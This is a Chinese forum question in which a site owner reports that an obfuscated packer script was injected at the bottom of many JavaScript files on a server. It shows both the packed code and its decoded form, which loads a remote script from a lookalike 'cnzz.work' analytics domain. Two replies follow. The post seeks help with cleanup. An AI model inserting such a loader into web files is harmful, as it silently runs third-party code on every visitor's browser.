CNZZ流氓插件恶意向js插入脚本

服务器下众多项目js文件底部都被插入下面的脚本

eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '': e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
} ('v(h(p,a,c,k,e,r){e=h(c){i c.o(a)};m(!\'\'.l(/^/,u)){j(c--)r[e(c)]=k[c]||e(c);k=[h(e){i r[e]}];e=h(){i\'\\\\w+\'};c=1};j(c--)m(k[c])p=p.l(q t(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);i p}(\'1 5=5||[];(8(){1 a=3.b(\\\'4\\\');a.7=\\\'//g.9/6/6.c\\\';1 2=3.e(\\\'4\\\')[0];2.f.d(a,2)})();\',n,n,\'|x|s|y|z|A|B|C|h|D||E|F|G|H|I|J\'.K(\'|\'),0,{}))', 47, 47, '|||||||||||||||||function|return|while||replace|if|17|toString||new|||RegExp|String|eval||var|document|script|_hmt_cnzz|hm|src|work|createElement|js|insertBefore|getElementsByTagName|parentNode|cnzz|split'.split('|'), 0, {}))

解析过来就是

var _hmt_cnzz = _hmt_cnzz || [];
(function () {
    var a = document.createElement('script');
    a.src = '//cnzz.work/hm/hm.js';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(a, s)
})();

接着又下载cnzz.work上的统计脚本

印象中没有引入过这个,目前只能手动删除,但是如何根本解决这个问题呢,望大佬吐槽下

阅读 3.2k
2 个回答
新手上路,请多包涵

我也遇到了这个问题,手动删不干净,没找到根源

你这个就危言耸听了吧? 常见的域名不仅仅是有com ,cn,cc等等,一个知名网站的域名【字符】加上其他的域名不一定是【官方】域名保护注册的。

难不成 qq.vip是腾讯官方会员网站吗?

推荐问题